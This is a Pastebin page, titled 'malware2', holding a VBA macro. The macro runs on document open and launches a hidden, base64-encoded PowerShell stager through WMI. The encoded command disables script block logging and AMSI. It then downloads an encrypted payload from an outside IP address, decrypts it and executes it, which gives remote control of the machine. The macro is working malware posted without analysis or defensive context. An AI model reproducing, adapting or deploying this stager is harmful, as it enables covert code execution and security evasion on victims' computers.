API tools faq
paste
Advertisement
Guest User

malware2

a guest
May 25th, 2019
199
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.95 KB | None | 0 0
raw download clone embed print report
  1. Sub Auto_Open()
  2. a
  3. End Sub
  4.  
  5. Sub AutoOpen()
  6. a
  7. End Sub
  8.  
  9. Sub Document_Open()
  10. a
  11. End Sub
  12.  
  13. Public Function a() As Variant
  14. Dim FJJL As String
  15. FJJL = "powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg"
  16. FJJL = FJJL + "BFAFIAcwBpAG8AbgBUAGEAYgBsAEUALgBQAFMAVgBFAHIAcwBp"
  17. FJJL = FJJL + "AE8ATgAuAE0AYQBqAE8AcgAgAC0ARwBlACAAMwApAHsAJABHAF"
  18. FJJL = FJJL + "AARgA9AFsAcgBFAEYAXQAuAEEAcwBzAGUATQBiAGwAWQAuAEcA"
  19. FJJL = FJJL + "RQB0AFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
  20. FJJL = FJJL + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBV"
  21. FJJL = FJJL + "AHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAGkAZQBgAEwAZAAiAC"
  22. FJJL = FJJL + "gAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkA"
  23. FJJL = FJJL + "UwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQ"
  24. FJJL = FJJL + "BiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABH"
  25. FJJL = FJJL + "AFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAG"
  26. FJJL = FJJL + "EAbAB1AEUAKAAkAE4AdQBMAEwAKQA7AEkAZgAoACQARwBQAEMA"
  27. FJJL = FJJL + "WwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZw"
  28. FJJL = FJJL + "BnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBw"
  29. FJJL = FJJL + "AHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAF"
  30. FJJL = FJJL + "sAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwA"
  31. FJJL = FJJL + "bwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQw"
  32. FJJL = FJJL + "BbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBn"
  33. FJJL = FJJL + "AGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAH"
  34. FJJL = FJJL + "AAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8A"
  35. FJJL = FJJL + "ZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBsAD0AWwBDAE8AbA"
  36. FJJL = FJJL + "BsAGUAYwB0AEkATwBuAFMALgBHAGUAbgBlAHIASQBjAC4ARABp"
  37. FJJL = FJJL + "AGMAdABJAE8ATgBhAFIAeQBbAHMAVABSAEkATgBHACwAUwB5AH"
  38. FJJL = FJJL + "MAdABlAE0ALgBPAGIASgBFAGMAdABdAF0AOgA6AE4ARQBXACgA"
  39. FJJL = FJJL + "KQA7ACQAdgBBAGwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUw"
  40. FJJL = FJJL + "BjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBu"
  41. FJJL = FJJL + "AGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAEQARAAoACcARQBuAG"
  42. FJJL = FJJL + "EAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8A"
  43. FJJL = FJJL + "YwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJA"
  44. FJJL = FJJL + "BHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBD"
  45. FJJL = FJJL + "AEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAG"
  46. FJJL = FJJL + "MAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQA"
  47. FJJL = FJJL + "bwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQ"
  48. FJJL = FJJL + "BwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBd"
  49. FJJL = FJJL + "AD0AJAB2AEEAbAB9AEUAbABzAEUAewBbAFMAYwByAEkAcAB0AE"
  50. FJJL = FJJL + "IATABvAGMASwBdAC4AIgBHAEUAVABGAGkARQBgAEwAZAAiACgA"
  51. FJJL = FJJL + "JwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbw"
  52. FJJL = FJJL + "BuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBl"
  53. FJJL = FJJL + "AFQAVgBhAGwAdQBlACgAJABuAHUATABsACwAKABOAEUAVwAtAE"
  54. FJJL = FJJL + "8AYgBqAEUAYwB0ACAAQwBPAEwAbABFAGMAVABpAG8ATgBzAC4A"
  55. FJJL = FJJL + "RwBlAE4ARQBSAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcg"
  56. FJJL = FJJL + "BpAG4AZwBdACkAKQB9AFsAUgBlAEYAXQAuAEEAcwBzAEUAbQBC"
  57. FJJL = FJJL + "AGwAeQAuAEcARQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC"
  58. FJJL = FJJL + "4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQA"
  59. FJJL = FJJL + "aQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJA"
  60. FJJL = FJJL + "BfAH0AfAAlAHsAJABfAC4ARwBlAFQARgBJAEUATABkACgAJwBh"
  61. FJJL = FJJL + "AG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG"
  62. FJJL = FJJL + "4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUA"
  63. FJJL = FJJL + "VABWAGEATAB1AGUAKAAkAE4AdQBMAEwALAAkAHQAcgB1AGUAKQ"
  64. FJJL = FJJL + "B9ADsAfQA7AFsAUwBZAHMAVABFAG0ALgBOAEUAVAAuAFMARQBS"
  65. FJJL = FJJL + "AHYAaQBjAGUAUABvAEkAbgB0AE0AYQBOAEEARwBFAHIAXQA6AD"
  66. FJJL = FJJL + "oARQBYAFAAZQBjAHQAMQAwADAAQwBPAE4AdABpAG4AdQBlAD0A"
  67. FJJL = FJJL + "MAA7ACQAdwBDAD0ATgBFAFcALQBPAGIAagBlAGMAdAAgAFMAeQ"
  68. FJJL = FJJL + "BTAFQARQBNAC4ATgBlAFQALgBXAEUAYgBDAEwAaQBFAE4AVAA7"
  69. FJJL = FJJL + "ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAG"
  70. FJJL = FJJL + "kAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYA"
  71. FJJL = FJJL + "NAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOg"
  72. FJJL = FJJL + "AxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAk"
  73. FJJL = FJJL + "AFcAYwAuAEgAZQBBAEQAZQByAHMALgBBAGQARAAoACcAVQBzAG"
  74. FJJL = FJJL + "UAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAA"
  75. FJJL = FJJL + "UgBPAHgAWQA9AFsAUwBZAFMAVABFAE0ALgBOAEUAVAAuAFcARQ"
  76. FJJL = FJJL + "BiAFIARQBRAHUARQBzAFQAXQA6ADoARABFAEYAQQBVAGwAdABX"
  77. FJJL = FJJL + "AEUAQgBQAFIAbwB4AFkAOwAkAHcAQwAuAFAAcgBvAHgAWQAuAE"
  78. FJJL = FJJL + "MAcgBlAGQAZQBOAHQAaQBhAEwAUwAgAD0AIABbAFMAeQBTAHQA"
  79. FJJL = FJJL + "RQBNAC4ATgBFAFQALgBDAHIAZQBkAEUATgBUAGkAQQBMAEMAYQ"
  80. FJJL = FJJL + "BDAGgAZQBdADoAOgBEAGUAZgBBAHUAbAB0AE4AZQB0AHcATwBy"
  81. FJJL = FJJL + "AGsAQwByAEUARABlAE4AdABpAGEAbABzADsAJABTAGMAcgBpAH"
  82. FJJL = FJJL + "AAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgA"
  83. FJJL = FJJL + "eQA7ACQASwA9AFsAUwB5AFMAVABFAG0ALgBUAGUAWAB0AC4ARQ"
  84. FJJL = FJJL + "BOAGMATwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQBU"
  85. FJJL = FJJL + "AEIAeQBUAGUAcwAoACcAegBYAC0AUQBWAG0AMgBVAGsAJQBUAD"
  86. FJJL = FJJL + "AASABAAFAALwBSAHMAIQBxACoAWwBXAE4AYQBmAHIAXQA9ACkA"
  87. FJJL = FJJL + "UwA+ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZw"
  88. FJJL = FJJL + "BTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8"
  89. FJJL = FJJL + "ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAF"
  90. FJJL = FJJL + "sAJABfACUAJABLAC4AQwBPAHUAbgB0AF0AKQAlADIANQA2ADsA"
  91. FJJL = FJJL + "JABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASg"
  92. FJJL = FJJL + "BdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAo"
  93. FJJL = FJJL + "ACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAF"
  94. FJJL = FJJL + "MAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQA"
  95. FJJL = FJJL + "UwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQ"
  96. FJJL = FJJL + "A7ACQAXwAtAGIAeABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQAr"
  97. FJJL = FJJL + "ACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAH"
  98. FJJL = FJJL + "IAPQAnAGgAdAB0AHAAOgAvAC8AMQA3ADIALgAzADEALgAzADcA"
  99. FJJL = FJJL + "LgAxADcAMQA6ADgAMAAnADsAJAB0AD0AJwAvAG4AZQB3AHMALg"
  100. FJJL = FJJL + "BwAGgAcAAnADsAJABXAGMALgBIAEUAYQBkAGUAUgBTAC4AQQBk"
  101. FJJL = FJJL + "AGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG"
  102. FJJL = FJJL + "4APQBPADcANgBsAHQAaQBFAFoAMAAxAGcAcgBPADQAUwBNAGkA"
  103. FJJL = FJJL + "RgBLAE0AMgA2ADgAUQBOAEcAQQA9ACIAKQA7ACQAZABhAHQAYQ"
  104. FJJL = FJJL + "A9ACQAVwBDAC4ARABPAFcATgBsAE8AQQBkAEQAQQB0AGEAKAAk"
  105. FJJL = FJJL + "AHMARQBSACsAJABUACkAOwAkAEkAVgA9ACQARABhAHQAQQBbAD"
  106. FJJL = FJJL + "AALgAuADMAXQA7ACQAZABhAHQAQQA9ACQARABBAFQAQQBbADQA"
  107. FJJL = FJJL + "LgAuACQARABhAFQAYQAuAEwAZQBOAGcAdABoAF0AOwAtAGoAbw"
  108. FJJL = FJJL + "BpAG4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABB"
  109. FJJL = FJJL + "AHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
  110. Const HIDDEN_WINDOW = 0
  111. strComputer = "."
  112. Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  113. Set objStartup = objWMIService.Get("Win32_ProcessStartup")
  114. Set objConfig = objStartup.SpawnInstance_
  115. objConfig.ShowWindow = HIDDEN_WINDOW
  116. Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
  117. objProcess.Create FJJL, Null, objConfig, intProcessID
  118. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!